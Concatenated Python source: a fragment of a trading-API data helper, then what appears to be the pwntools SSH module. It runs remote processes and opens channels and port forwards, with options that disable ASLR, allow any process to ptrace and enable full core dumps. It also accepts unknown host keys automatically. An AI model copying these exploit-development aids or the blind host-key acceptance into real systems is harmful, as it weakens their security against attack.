if std_time is None:
str_time = now().strftime(timetype)
else:
str_time = std_time.strftime(timetype)
return str_time
def comma2int(t):
if ' ' in t:
t = t.split(' ')[1]
if ',' in t:
t = t.replace(',', '')
return int(t)
def float2str3p2(t):
t = str(t)
if len(t.split('.')[0]) == 1:
t = ' ' + t
if len(t.split('.')[0]) == 2:
t = ' ' + t
if len(t.split('.')[1]) == 1:
t += '0'
return t
def float2str2p2(t):
t = str(t)
if len(t.split('.')[0]) == 1:
t = ' ' + t
if len(t.split('.')[1]) == 1:
t += '0'
return t
def readEnc(trcode):
enc = zipfile.ZipFile(f'{openapi_path}/data/{trcode}.enc')
lines = enc.read(trcode.upper() + '.dat').decode('cp949')
return lines
def parseDat(trcode, lines):
lines = lines.split('\n')
start = [i for i, x in enumerate(lines) if x.startswith('@START')]
end = [i for i, x in enumerate(lines) if x.startswith('@END')]
block = zip(start, end)
enc_data = {'trcode': trcode, 'input': [], 'output': []}
for start, end in block:
block_data = lines[start - 1:end + 1]
block_info = block_data[0]
block_type = 'input' if 'INPUT' in block_info else 'output'
record_line = block_data[1]
tokens = record_line.split('_')[1].strip()
record = tokens.split('=')[0]
fields = block_data[2:-1]
field_name = []
for line in fields:
field = line.split('=')[0].strip()
field_name.append(field)
fields = {record: field_name}
enc_data['input'].append(fields) if block_type == 'input' else enc_data['output'].append(fields)
return enc_data
|
ssh.py
|
from __future__ import absolute_import
from __future__ import division
import inspect
import logging
import os
import re
import shutil
import six
import string
import sys
import tarfile
import tempfile
import threading
import time
import types
from pwnlib import term
from pwnlib.context import context
from pwnlib.log import Logger
from pwnlib.log import getLogger
from pwnlib.term import text
from pwnlib.timeout import Timeout
from pwnlib.tubes.sock import sock
from pwnlib.util import hashes
from pwnlib.util import misc
from pwnlib.util import safeeval
from pwnlib.util.sh_string import sh_string
# Kill the warning line:
# No handlers could be found for logger "paramiko.transport"
paramiko_log = logging.getLogger("paramiko.transport")
h = logging.StreamHandler(open(os.devnull,'w+'))
h.setFormatter(logging.Formatter())
paramiko_log.addHandler(h)
class ssh_channel(sock):
#: Parent :class:`ssh` object
parent = None
#: Remote host
host = None
#: Return code, or :const:`None` if the process has not returned
#: Use :meth:`poll` to check.
returncode = None
#: :const:`True` if a tty was allocated for this channel
tty = False
#: Environment specified for the remote process, or :const:`None`
#: if the default environment was used
env = None
#: Command specified for the constructor
process = None
def __init__(self, parent, process = None, tty = False, wd = None, env = None, raw = True, *args, **kwargs):
super(ssh_channel, self).__init__(*args, **kwargs)
# keep the parent from being garbage collected in some cases
self.parent = parent
self.returncode = None
self.host = parent.host
self.tty = tty
self.env = env
self.process = process
self.cwd = wd or '.'
if isinstance(wd, six.text_type):
wd = wd.encode('utf-8')
env = env or {}
msg = 'Opening new channel: %r' % (process or 'shell')
if isinstance(process, (list, tuple)):
process = b' '.join((lambda x:x.encode('utf-8') if isinstance(x, six.text_type) else x)(sh_string(s)) for s in process)
if isinstance(process, six.text_type):
process = process.encode('utf-8')
if process and wd:
process = b'cd ' + sh_string(wd) + b' >/dev/null 2>&1;' + process
if process and env:
for name, value in env.items():
if not re.match('^[a-zA-Z_][a-zA-Z0-9_]*$', name):
self.error('run(): Invalid environment key %r' % name)
export = 'export %s=%s;' % (name, sh_string(value))
if isinstance(export, six.text_type):
export = export.encode('utf-8')
process = export + process
if process and tty:
if raw:
process = b'stty raw -ctlecho -echo; ' + process
else:
process = b'stty -ctlecho -echo; ' + process
# If this object is enabled for DEBUG-level logging, don't hide
# anything about the command that's actually executed.
if process and self.isEnabledFor(logging.DEBUG):
msg = 'Opening new channel: %r' % ((process,) or 'shell')
with self.waitfor(msg) as h:
import paramiko
try:
self.sock = parent.transport.open_session()
except paramiko.ChannelException as e:
if e.args == (1, 'Administratively prohibited'):
self.error("Too many sessions open! Use ssh_channel.close() or 'with'!")
raise e
if self.tty:
self.sock.get_pty('xterm', term.width, term.height)
def resizer():
if self.sock:
try:
self.sock.resize_pty(term.width, term.height)
except paramiko.ssh_exception.SSHException:
pass
self.resizer = resizer
term.term.on_winch.append(self.resizer)
else:
self.resizer = None
# Put stderr on stdout. This might not always be desirable,
# but our API does not support multiple streams
self.sock.set_combine_stderr(True)
self.settimeout(self.timeout)
if process:
self.sock.exec_command(process)
else:
self.sock.invoke_shell()
h.success()
def kill(self):
"""kill()
Kills the process.
"""
self.close()
def recvall(self, timeout = sock.forever):
# We subclass tubes.sock which sets self.sock to None.
#
# However, we need to wait for the return value to propagate,
# which may not happen by the time .close() is called by tube.recvall()
tmp_sock = self.sock
tmp_close = self.close
self.close = lambda: None
timeout = self.maximum if self.timeout is self.forever else self.timeout
data = super(ssh_channel, self).recvall(timeout)
# Restore self.sock to be able to call wait()
self.close = tmp_close
self.sock = tmp_sock
self.wait()
self.close()
# Again set self.sock to None
self.sock = None
return data
def wait(self, timeout=sock.default):
# TODO: deal with timeouts
return self.poll(block=True)
def poll(self, block=False):
"""poll() -> int
Poll the exit code of the process. Will return None, if the
process has not yet finished and the exit code otherwise.
"""
if self.returncode is None and self.sock \
and (block or self.sock.exit_status_ready()):
while not self.sock.status_event.is_set():
self.sock.status_event.wait(0.05)
self.returncode = self.sock.recv_exit_status()
return self.returncode
def can_recv_raw(self, timeout):
with self.countdown(timeout):
while self.countdown_active():
if self.sock.recv_ready():
return True
time.sleep(min(self.timeout, 0.05))
return False
def interactive(self, prompt = term.text.bold_red('$') + ' '):
"""interactive(prompt = pwnlib.term.text.bold_red('$') + ' ')
If not in TTY-mode, this does exactly the same as
meth:`pwnlib.tubes.tube.tube.interactive`, otherwise
it does mostly the same.
An SSH connection in TTY-mode will typically supply its own prompt,
thus the prompt argument is ignored in this case.
We also have a few SSH-specific hacks that will ideally be removed
once the :mod:`pwnlib.term` is more mature.
"""
# If we are only executing a regular old shell, we need to handle
# control codes (specifically Ctrl+C).
#
# Otherwise, we can just punt to the default implementation of interactive()
if self.process is not None:
return super(ssh_channel, self).interactive(prompt)
self.info('Switching to interactive mode')
# We would like a cursor, please!
term.term.show_cursor()
event = threading.Event()
def recv_thread(event):
while not event.is_set():
try:
cur = self.recv(timeout = 0.05)
cur = cur.replace(b'\r\n',b'\n')
cur = cur.replace(b'\r',b'')
if cur is None:
continue
elif cur == b'\a':
# Ugly hack until term unstands bell characters
continue
stdout = sys.stdout
if not term.term_mode:
stdout = getattr(stdout, 'buffer', stdout)
stdout.write(cur)
stdout.flush()
except EOFError:
self.info('Got EOF while reading in interactive')
event.set()
break
t = context.Thread(target = recv_thread, args = (event,))
t.daemon = True
t.start()
while not event.is_set():
if term.term_mode:
try:
data = term.key.getraw(0.1)
except KeyboardInterrupt:
data = [3] # This is ctrl-c
except IOError:
if not event.is_set():
raise
else:
stdin = getattr(sys.stdin, 'buffer', sys.stdin)
data = stdin.read(1)
if not data:
event.set()
else:
data = [six.byte2int(data)]
if data:
try:
self.send(b''.join(six.int2byte(c) for c in data))
except EOFError:
event.set()
self.info('Got EOF while sending in interactive')
while t.is_alive():
t.join(timeout = 0.1)
# Restore
term.term.hide_cursor()
def close(self):
self.poll()
while self.resizer in term.term.on_winch:
term.term.on_winch.remove(self.resizer)
super(ssh_channel, self).close()
def spawn_process(self, *args, **kwargs):
self.error("Cannot use spawn_process on an SSH channel.""")
def _close_msg(self):
self.info('Closed SSH channel with %s' % self.host)
class ssh_process(ssh_channel):
#: Working directory
cwd = None
#: PID of the process
#: Only valid when instantiated through :meth:`ssh.process`
pid = None
#: Executable of the procesks
#: Only valid when instantiated through :meth:`ssh.process`
executable = None
#: Arguments passed to the process
#: Only valid when instantiated through :meth:`ssh.process`
argv = None
def libs(self):
"""libs() -> dict
Returns a dictionary mapping the address of each loaded library in the
process's address space.
If ``/proc/$PID/maps`` cannot be opened, the output of ldd is used
verbatim, which may be different than the actual addresses if ASLR
is enabled.
"""
maps = self.parent.libs(self.executable)
maps_raw = self.parent.cat('/proc/%d/maps' % self.pid)
for lib in maps:
remote_path = lib.split(self.parent.host)[-1]
for line in maps_raw.splitlines():
if line.endswith(remote_path):
address = line.split('-')[0]
maps[lib] = int(address, 16)
break
return maps
@property
def libc(self):
"""libc() -> ELF
Returns an ELF for the libc for the current process.
If possible, it is adjusted to the correct address
automatically.
"""
from pwnlib.elf import ELF
for lib, address in self.libs().items():
if 'libc.so' in lib:
e = ELF(lib)
e.address = address
return e
@property
def elf(self):
"""elf() -> pwnlib.elf.elf.ELF
Returns an ELF file for the executable that launched the process.
"""
import pwnlib.elf.elf
libs = self.parent.libs(self.executable)
for lib in libs:
# Cannot just check "executable in lib", see issue #1047
if lib.endswith(self.executable):
return pwnlib.elf.elf.ELF(lib)
@property
def corefile(self):
import pwnlib.elf.corefile
finder = pwnlib.elf.corefile.CorefileFinder(self)
if not finder.core_path:
self.error("Could not find core file for pid %i" % self.pid)
return pwnlib.elf.corefile.Corefile(finder.core_path)
def getenv(self, variable, **kwargs):
"""Retrieve the address of an environment variable in the remote process.
"""
argv0 = self.argv[0]
script = ';'.join(('from ctypes import *',
'import os',
'libc = CDLL("libc.so.6")',
'print(os.path.realpath(%r))' % self.executable,
'print(libc.getenv(%r))' % variable,))
try:
with context.local(log_level='error'):
python = self.parent.which('python')
if not python:
self.error("Python is not installed on the remote system.")
io = self.parent.process([argv0,'-c', script.strip()],
executable=python,
env=self.env,
**kwargs)
path = io.recvline()
address = int(io.recvline())
address -= len(python)
address += len(path)
return int(address) & context.mask
except:
self.exception("Could not look up environment variable %r" % variable)
def _close_msg(self):
# If we never completely started up, just use the parent implementation
if self.executable is None:
return super(ssh_process, self)._close_msg()
self.info('Stopped remote process %r on %s (pid %i)' \
% (os.path.basename(self.executable),
self.host,
self.pid))
class ssh_connecter(sock):
def __init__(self, parent, host, port, *a, **kw):
super(ssh_connecter, self).__init__(*a, **kw)
# keep the parent from being garbage collected in some cases
self.parent = parent
self.host = parent.host
self.rhost = host
self.rport = port
msg = 'Connecting to %s:%d via SSH to %s' % (self.rhost, self.rport, self.host)
with self.waitfor(msg) as h:
try:
self.sock = parent.transport.open_channel('direct-tcpip', (host, port), ('127.0.0.1', 0))
except Exception as e:
self.exception(e.message)
raise
try:
# Iterate all layers of proxying to get to base-level Socket object
curr = self.sock.get_transport().sock
while getattr(curr, "get_transport", None):
curr = curr.get_transport().sock
sockname = curr.getsockname()
self.lhost = sockname[0]
self.lport = sockname[1]
except Exception as e:
self.exception("Could not find base-level Socket object.")
raise e
h.success()
def spawn_process(self, *args, **kwargs):
self.error("Cannot use spawn_process on an SSH channel.""")
def _close_msg(self):
self.info("Closed remote connection to %s:%d via SSH connection to %s" % (self.rhost, self.rport, self.host))
class ssh_listener(sock):
def __init__(self, parent, bind_address, port, *a, **kw):
super(ssh_listener, self).__init__(*a, **kw)
# keep the parent from being garbage collected in some cases
self.parent = parent
self.host = parent.host
try:
self.port = parent.transport.request_port_forward(bind_address, port)
except Exception:
h.failure('Failed create a port forwarding')
raise
def accepter():
msg = 'Waiting on port %d via SSH to %s' % (self.port, self.host)
h = self.waitfor(msg)
try:
self.sock = parent.transport.accept()
parent.transport.cancel_port_forward(bind_address, self.port)
except Exception:
self.sock = None
h.failure()
self.exception('Failed to get a connection')
return
self.rhost, self.rport = self.sock.origin_addr
h.success('Got connection from %s:%d' % (self.rhost, self.rport))
self._accepter = context.Thread(target = accepter)
self._accepter.daemon = True
self._accepter.start()
def _close_msg(self):
self.info("Closed remote connection to %s:%d via SSH listener on port %d via %s" % (self.rhost, self.rport, self.port, self.host))
def spawn_process(self, *args, **kwargs):
self.error("Cannot use spawn_process on an SSH channel.""")
def wait_for_connection(self):
"""Blocks until a connection has been established."""
_ = self.sock
return self
def __getattr__(self, key):
if key == 'sock':
while self._accepter.is_alive():
self._accepter.join(timeout = 0.1)
return self.sock
else:
return getattr(super(ssh_listener, self), key)
class ssh(Timeout, Logger):
#: Remote host name (``str``)
host = None
#: Remote port (``int``)
port = None
#: Working directory (``str``)
cwd = None
#: Enable caching of SSH downloads (``bool``)
cache = True
#: Paramiko SSHClient which backs this object
client = None
#: Paramiko SFTPClient object which is used for file transfers.
#: Set to :const:`None` to disable ``sftp``.
sftp = None
#: PID of the remote ``sshd`` process servicing this connection.
pid = None
def __init__(self, user=None, host=None, port=22, password=None, key=None,
keyfile=None, proxy_command=None, proxy_sock=None,
level=None, cache=True, ssh_agent=False, *a, **kw):
"""Creates a new ssh connection.
Arguments:
user(str): The username to log in with
host(str): The hostname to connect to
port(int): The port to connect to
password(str): Try to authenticate using this password
key(str): Try to authenticate using this private key. The string should be the actual private key.
keyfile(str): Try to authenticate using this private key. The string should be a filename.
proxy_command(str): Use this as a proxy command. It has approximately the same semantics as ProxyCommand from ssh(1).
proxy_sock(str): Use this socket instead of connecting to the host.
timeout: Timeout, in seconds
level: Log level
cache: Cache downloaded files (by hash/size/timestamp)
ssh_agent: If :const:`True`, enable usage of keys via ssh-agent
NOTE: The proxy_command and proxy_sock arguments is only available if a
fairly new version of paramiko is used.
Example proxying:
>>> s1 = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> r1 = s1.remote('localhost', 22)
>>> s2 = ssh(host='example.pwnme',
... user='travis',
... password='demopass',
... proxy_sock=r1.sock)
>>> r2 = s2.remote('localhost', 22) # and so on...
>>> for x in r2, s2, r1, s1: x.close()
"""
super(ssh, self).__init__(*a, **kw)
Logger.__init__(self)
if level is not None:
self.setLevel(level)
self.host = host
self.port = port
self.user = user
self.password = password
self.key = key
self.keyfile = keyfile
self._cachedir = os.path.join(tempfile.gettempdir(), 'pwntools-ssh-cache')
self.cwd = '.'
self.cache = cache
# Deferred attributes
self._platform_info = {}
self._aslr = None
self._aslr_ulimit = None
misc.mkdir_p(self._cachedir)
# This is a dirty hack to make my Yubikey shut up.
# If anybody has a problem with this, please open a bug and I'll
# figure out a better workaround.
if not ssh_agent:
os.environ.pop('SSH_AUTH_SOCK', None)
import paramiko
# Make a basic attempt to parse the ssh_config file
try:
config_file = os.path.expanduser('~/.ssh/config')
if os.path.exists(config_file):
ssh_config = paramiko.SSHConfig()
ssh_config.parse(open(config_file))
host_config = ssh_config.lookup(host)
if 'hostname' in host_config:
self.host = host = host_config['hostname']
if not keyfile and 'identityfile' in host_config:
keyfile = host_config['identityfile'][0]
if keyfile.lower() == 'none':
keyfile = None
except Exception as e:
self.debug("An error occurred while parsing ~/.ssh/config:\n%s" % e)
keyfiles = [os.path.expanduser(keyfile)] if keyfile else []
msg = 'Connecting to %s on port %d' % (host, port)
with self.waitfor(msg) as h:
self.client = paramiko.SSHClient()
self.client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
known_hosts = os.path.expanduser('~/.ssh/known_hosts')
if os.path.exists(known_hosts):
self.client.load_host_keys(known_hosts)
has_proxy = (proxy_sock or proxy_command) and True
if has_proxy:
if 'ProxyCommand' not in dir(paramiko):
self.error('This version of paramiko does not support proxies.')
if proxy_sock and proxy_command:
self.error('Cannot have both a proxy command and a proxy sock')
if proxy_command:
proxy_sock = paramiko.ProxyCommand(proxy_command)
self.client.connect(host, port, user, password, key, keyfiles, self.timeout, compress = True, sock = proxy_sock)
else:
self.client.connect(host, port, user, password, key, keyfiles, self.timeout, compress = True)
self.transport = self.client.get_transport()
self.transport.use_compression(True)
h.success()
self._tried_sftp = False
with context.local(log_level='error'):
def getppid():
print(os.getppid())
try:
self.pid = int(self.process('false', preexec_fn=getppid).recvall())
except Exception:
self.pid = None
try:
self.info_once(self.checksec())
except Exception:
self.warn_once("Couldn't check security settings on %r" % self.host)
@property
def sftp(self):
if not self._tried_sftp:
try:
self._sftp = self.transport.open_sftp_client()
except Exception:
self._sftp = None
self._tried_sftp = True
return self._sftp
@sftp.setter
def sftp(self, value):
self._sftp = value
self._tried_sftp = True
def __enter__(self, *a):
return self
def __exit__(self, *a, **kw):
self.close()
def shell(self, shell = None, tty = True, timeout = Timeout.default):
"""shell(shell = None, tty = True, timeout = Timeout.default) -> ssh_channel
Open a new channel with a shell inside.
Arguments:
shell(str): Path to the shell program to run.
If :const:`None`, uses the default shell for the logged in user.
tty(bool): If :const:`True`, then a TTY is requested on the remote server.
Returns:
Return a :class:`pwnlib.tubes.ssh.ssh_channel` object.
Examples:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> sh = s.shell('/bin/sh')
>>> sh.sendline(b'echo Hello; exit')
>>> print(b'Hello' in sh.recvall())
True
"""
return self.run(shell, tty, timeout = timeout)
def process(self, argv=None, executable=None, tty=True, cwd=None, env=None, timeout=Timeout.default, run=True,
stdin=0, stdout=1, stderr=2, preexec_fn=None, preexec_args=(), raw=True, aslr=None, setuid=None,
shell=False):
r"""
Executes a process on the remote server, in the same fashion
as pwnlib.tubes.process.process.
To achieve this, a Python script is created to call ``os.execve``
with the appropriate arguments.
As an added bonus, the ``ssh_channel`` object returned has a
``pid`` property for the process pid.
Arguments:
argv(list):
List of arguments to pass into the process
executable(str):
Path to the executable to run.
If :const:`None`, ``argv[0]`` is used.
tty(bool):
Request a `tty` from the server. This usually fixes buffering problems
by causing `libc` to write data immediately rather than buffering it.
However, this disables interpretation of control codes (e.g. Ctrl+C)
and breaks `.shutdown`.
cwd(str):
Working directory. If :const:`None`, uses the working directory specified
on :attr:`cwd` or set via :meth:`set_working_directory`.
env(dict):
Environment variables to set in the child. If :const:`None`, inherits the
default environment.
timeout(int):
Timeout to set on the `tube` created to interact with the process.
run(bool):
Set to :const:`True` to run the program (default).
If :const:`False`, returns the path to an executable Python script on the
remote server which, when executed, will do it.
stdin(int, str):
If an integer, replace stdin with the numbered file descriptor.
If a string, a open a file with the specified path and replace
stdin with its file descriptor. May also be one of ``sys.stdin``,
``sys.stdout``, ``sys.stderr``. If :const:`None`, the file descriptor is closed.
stdout(int, str):
See ``stdin``.
stderr(int, str):
See ``stdin``.
preexec_fn(callable):
Function which is executed on the remote side before execve().
This **MUST** be a self-contained function -- it must perform
all of its own imports, and cannot refer to variables outside
its scope.
preexec_args(object):
Argument passed to ``preexec_fn``.
This **MUST** only consist of native Python objects.
raw(bool):
If :const:`True`, disable TTY control code interpretation.
aslr(bool):
See :class:`pwnlib.tubes.process.process` for more information.
setuid(bool):
See :class:`pwnlib.tubes.process.process` for more information.
shell(bool):
Pass the command-line arguments to the shell.
Returns:
A new SSH channel, or a path to a script if ``run=False``.
Notes:
Requires Python on the remote server.
Examples:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> sh = s.process('/bin/sh', env={'PS1':''})
>>> sh.sendline(b'echo Hello; exit')
>>> sh.recvall()
b'Hello\n'
>>> s.process(['/bin/echo', b'\xff']).recvall()
b'\xff\n'
>>> s.process(['readlink', '/proc/self/exe']).recvall()
b'/bin/readlink\n'
>>> s.process(['LOLOLOL', '/proc/self/exe'], executable='readlink').recvall()
b'/bin/readlink\n'
>>> s.process(['LOLOLOL\x00', '/proc/self/cmdline'], executable='cat').recvall()
b'LOLOLOL\x00/proc/self/cmdline\x00'
>>> sh = s.process(executable='/bin/sh')
>>> str(sh.pid).encode() in s.pidof('sh') # doctest: +SKIP
True
>>> s.process(['pwd'], cwd='/tmp').recvall()
b'/tmp\n'
>>> p = s.process(['python','-c','import os; os.write(1, os.read(2, 1024))'], stderr=0)
>>> p.send(b'hello')
>>> p.recv()
b'hello'
>>> s.process(['/bin/echo', 'hello']).recvall()
b'hello\n'
>>> s.process(['/bin/echo', 'hello'], stdout='/dev/null').recvall()
b''
>>> s.process(['/usr/bin/env'], env={}).recvall()
b''
>>> s.process('/usr/bin/env', env={'A':'B'}).recvall()
b'A=B\n'
>>> s.process('false', preexec_fn=1234)
Traceback (most recent call last):
...
PwnlibException: preexec_fn must be a function
>>> s.process('false', preexec_fn=lambda: 1234)
Traceback (most recent call last):
...
PwnlibException: preexec_fn cannot be a lambda
>>> def uses_globals():
... foo = bar
>>> print(s.process('false', preexec_fn=uses_globals).recvall().strip().decode()) # doctest: +ELLIPSIS
Traceback (most recent call last):
...
NameError: ... name 'bar' is not defined
>>> s.process('echo hello', shell=True).recvall()
b'hello\n'
>>> io = s.process(['cat'], timeout=5)
>>> io.recvline()
b''
"""
if not argv and not executable:
self.error("Must specify argv or executable")
argv = argv or []
aslr = aslr if aslr is not None else context.aslr
if isinstance(argv, (six.text_type, six.binary_type)):
argv = [argv]
if not isinstance(argv, (list, tuple)):
self.error('argv must be a list or tuple')
if not all(isinstance(arg, (six.text_type, six.binary_type)) for arg in argv):
self.error("argv must be strings or bytes: %r" % argv)
if shell:
if len(argv) != 1:
self.error('Cannot provide more than 1 argument if shell=True')
argv = ['/bin/sh', '-c'] + argv
# Create a duplicate so we can modify it
argv = list(argv or [])
# Python doesn't like when an arg in argv contains '\x00'
# -> execve() arg 2 must contain only strings
for i, oarg in enumerate(argv):
if isinstance(oarg, six.text_type):
arg = oarg.encode('utf-8')
else:
arg = oarg
if b'\x00' in arg[:-1]:
self.error('Inappropriate nulls in argv[%i]: %r' % (i, oarg))
argv[i] = bytearray(arg.rstrip(b'\x00'))
if env is not None and not isinstance(env, dict) and env != os.environ:
self.error("env must be a dict: %r" % env)
# Converts the environment variables to a list of tuples to retain order.
env2 = []
# Python also doesn't like when envp contains '\x00'
if env and hasattr(env, 'items'):
for k, v in env.items():
if isinstance(k, six.text_type):
k = k.encode('utf-8')
if isinstance(v, six.text_type):
v = v.encode('utf-8')
if b'\x00' in k[:-1]:
self.error('Inappropriate nulls in environment key %r' % k)
if b'\x00' in v[:-1]:
self.error('Inappropriate nulls in environment value %r=%r' % (k, v))
env2.append((bytearray(k.rstrip(b'\x00')), bytearray(v.rstrip(b'\x00'))))
env = env2 or env
executable = executable or argv[0]
cwd = cwd or self.cwd
# Validate, since failures on the remote side will suck.
if not isinstance(executable, (six.text_type, six.binary_type, bytearray)):
self.error("executable / argv[0] must be a string: %r" % executable)
executable = context._decode(executable)
# Allow passing in sys.stdin/stdout/stderr objects
handles = {sys.stdin: 0, sys.stdout:1, sys.stderr:2}
stdin = handles.get(stdin, stdin)
stdout = handles.get(stdout, stdout)
stderr = handles.get(stderr, stderr)
# Allow the user to provide a self-contained function to run
def func(): pass
func = preexec_fn or func
func_args = preexec_args
if not isinstance(func, types.FunctionType):
self.error("preexec_fn must be a function")
func_name = func.__name__
if func_name == (lambda: 0).__name__:
self.error("preexec_fn cannot be a lambda")
func_src = inspect.getsource(func).strip()
setuid = True if setuid is None else bool(setuid)
script = r"""
#!/usr/bin/env python
import os, sys, ctypes, resource, platform, stat
from collections import OrderedDict
try:
integer_types = int, long
except NameError:
integer_types = int,
exe = %(executable)r
argv = [bytes(a) for a in %(argv)r]
env = %(env)r
os.chdir(%(cwd)r)
if env is not None:
env = OrderedDict((bytes(k), bytes(v)) for k,v in env)
os.environ.clear()
getattr(os, 'environb', os.environ).update(env)
else:
env = os.environ
def is_exe(path):
return os.path.isfile(path) and os.access(path, os.X_OK)
PATH = os.environ.get('PATH','').split(os.pathsep)
if os.path.sep not in exe and not is_exe(exe):
for path in PATH:
test_path = os.path.join(path, exe)
if is_exe(test_path):
exe = test_path
break
if not is_exe(exe):
sys.stderr.write('3\n')
sys.stderr.write("{} is not executable or does not exist in $PATH: {}".format(exe,PATH))
sys.exit(-1)
if not %(setuid)r:
PR_SET_NO_NEW_PRIVS = 38
result = ctypes.CDLL('libc.so.6').prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)
if result != 0:
sys.stdout.write('3\n')
sys.stdout.write("Could not disable setuid: prctl(PR_SET_NO_NEW_PRIVS) failed")
sys.exit(-1)
try:
PR_SET_PTRACER = 0x59616d61
PR_SET_PTRACER_ANY = -1
ctypes.CDLL('libc.so.6').prctl(PR_SET_PTRACER, PR_SET_PTRACER_ANY, 0, 0, 0)
except Exception:
pass
# Determine what UID the process will execute as
# This is used for locating apport core dumps
suid = os.getuid()
sgid = os.getgid()
st = os.stat(exe)
if %(setuid)r:
if (st.st_mode & stat.S_ISUID):
suid = st.st_uid
if (st.st_mode & stat.S_ISGID):
sgid = st.st_gid
if sys.argv[-1] == 'check':
sys.stdout.write("1\n")
sys.stdout.write(str(os.getpid()) + "\n")
sys.stdout.write(str(os.getuid()) + "\n")
sys.stdout.write(str(os.getgid()) + "\n")
sys.stdout.write(str(suid) + "\n")
sys.stdout.write(str(sgid) + "\n")
sys.stdout.write(os.path.realpath(exe) + '\x00')
sys.stdout.flush()
for fd, newfd in {0: %(stdin)r, 1: %(stdout)r, 2:%(stderr)r}.items():
if newfd is None:
os.close(fd)
elif isinstance(newfd, (str, bytes)):
newfd = os.open(newfd, os.O_RDONLY if fd == 0 else (os.O_RDWR|os.O_CREAT))
os.dup2(newfd, fd)
os.close(newfd)
elif isinstance(newfd, integer_types) and newfd != fd:
os.dup2(fd, newfd)
if not %(aslr)r:
if platform.system().lower() == 'linux' and %(setuid)r is not True:
ADDR_NO_RANDOMIZE = 0x0040000
ctypes.CDLL('libc.so.6').personality(ADDR_NO_RANDOMIZE)
resource.setrlimit(resource.RLIMIT_STACK, (-1, -1))
# Attempt to dump ALL core file regions
try:
with open('/proc/self/coredump_filter', 'w') as core_filter:
core_filter.write('0x3f\n')
except Exception:
pass
# Assume that the user would prefer to have core dumps.
try:
resource.setrlimit(resource.RLIMIT_CORE, (-1, -1))
except Exception:
pass
%(func_src)s
%(func_name)s(*%(func_args)r)
os.execve(exe, argv, env)
""" % locals()
script = script.strip()
self.debug("Created execve script:\n" + script)
if not run:
with context.local(log_level='error'):
tmpfile = self.mktemp('-t', 'pwnlib-execve-XXXXXXXXXX')
self.chmod('+x', tmpfile)
self.info("Uploading execve script to %r" % tmpfile)
self.upload_data(script, tmpfile)
return tmpfile
if self.isEnabledFor(logging.DEBUG):
execve_repr = "execve(%r, %s, %s)" % (executable,
argv,
'os.environ'
if (env in (None, os.environ))
else env)
# Avoid spamming the screen
if self.isEnabledFor(logging.DEBUG) and len(execve_repr) > 512:
execve_repr = execve_repr[:512] + '...'
else:
execve_repr = repr(executable)
msg = 'Starting remote process %s on %s' % (execve_repr, self.host)
if timeout == Timeout.default:
timeout = self.timeout
with self.progress(msg) as h:
script = 'for py in python2.7 python2 python; do test -x "$(which $py 2>&1)" && exec $py -c %s check; done; echo 2' % sh_string(script)
with context.quiet:
python = ssh_process(self, script, tty=True, raw=True, level=self.level, timeout=timeout)
try:
result = safeeval.const(python.recvline())
except (EOFError, ValueError):
h.failure("Process creation failed")
self.warn_once('Could not find a Python interpreter on %s\n' % self.host \
+ "Use ssh.run() instead of ssh.process()")
return None
# If an error occurred, try to grab as much output
# as we can.
if result != 1:
error_message = python.recvrepeat(timeout=1)
if result == 0:
self.error("%r does not exist or is not executable" % executable)
elif result == 3:
self.error(error_message)
elif result == 2:
self.error("python is not installed on the remote system %r" % self.host)
elif result != 1:
h.failure("something bad happened:\n%s" % error_message)
python.pid = safeeval.const(python.recvline())
python.uid = safeeval.const(python.recvline())
python.gid = safeeval.const(python.recvline())
python.suid = safeeval.const(python.recvline())
python.sgid = safeeval.const(python.recvline())
python.argv = argv
python.executable = context._decode(python.recvuntil(b'\x00')[:-1])
h.success('pid %i' % python.pid)
if not aslr and setuid and (python.uid != python.suid or python.gid != python.sgid):
effect = "partial" if self.aslr_ulimit else "no"
message = "Specfied aslr=False on setuid binary %s\n" % python.executable
message += "This will have %s effect. Add setuid=False to disable ASLR for debugging.\n" % effect
if self.aslr_ulimit:
message += "Unlimited stack size should de-randomize shared libraries."
self.warn_once(message)
elif not aslr:
self.warn_once("ASLR is disabled for %r!" % python.executable)
return python
def which(self, program):
"""which(program) -> str
Minor modification to just directly invoking ``which`` on the remote
system which adds the current working directory to the end of ``$PATH``.
"""
# If name is a path, do not attempt to resolve it.
if os.path.sep in program:
return program
result = self.run('export PATH=$PATH:$PWD; which %s' % program).recvall().strip().decode()
if ('/%s' % program) not in result:
return None
return result
def system(self, process, tty = True, wd = None, env = None, timeout = None, raw = True):
r"""system(process, tty = True, wd = None, env = None, timeout = Timeout.default, raw = True) -> ssh_channel
Open a new channel with a specific process inside. If `tty` is True,
then a TTY is requested on the remote server.
If `raw` is True, terminal control codes are ignored and input is not
echoed back.
Return a :class:`pwnlib.tubes.ssh.ssh_channel` object.
Examples:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> py = s.run('python -i')
>>> _ = py.recvuntil(b'>>> ')
>>> py.sendline(b'print(2+2)')
>>> py.sendline(b'exit')
>>> print(repr(py.recvline()))
b'4\n'
"""
if wd is None:
wd = self.cwd
if timeout is None:
timeout = self.timeout
return ssh_channel(self, process, tty, wd, env, timeout = timeout, level = self.level, raw = raw)
#: Backward compatibility. Use :meth:`system`
run = system
def getenv(self, variable, **kwargs):
"""Retrieve the address of an environment variable on the remote
system.
Note:
The exact address will differ based on what other environment
variables are set, as well as argv[0]. In order to ensure that
the path is *exactly* the same, it is recommended to invoke the
process with ``argv=[]``.
"""
script = '''
from ctypes import *; libc = CDLL('libc.so.6'); print(libc.getenv(%r))
''' % variable
with context.local(log_level='error'):
python = self.which('python')
if not python:
self.error("Python is not installed on the remote system.")
io = self.process(['','-c', script.strip()], executable=python, **kwargs)
result = io.recvall()
try:
return int(result) & context.mask
except ValueError:
self.exception("Could not look up environment variable %r" % variable)
def run_to_end(self, process, tty = False, wd = None, env = None):
r"""run_to_end(process, tty = False, timeout = Timeout.default, env = None) -> str
Run a command on the remote server and return a tuple with
(data, exit_status). If `tty` is True, then the command is run inside
a TTY on the remote server.
Examples:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> print(s.run_to_end('echo Hello; exit 17'))
(b'Hello\n', 17)
"""
with context.local(log_level = 'ERROR'):
c = self.run(process, tty, wd = wd, timeout = Timeout.default)
data = c.recvall()
retcode = c.wait()
c.close()
return data, retcode
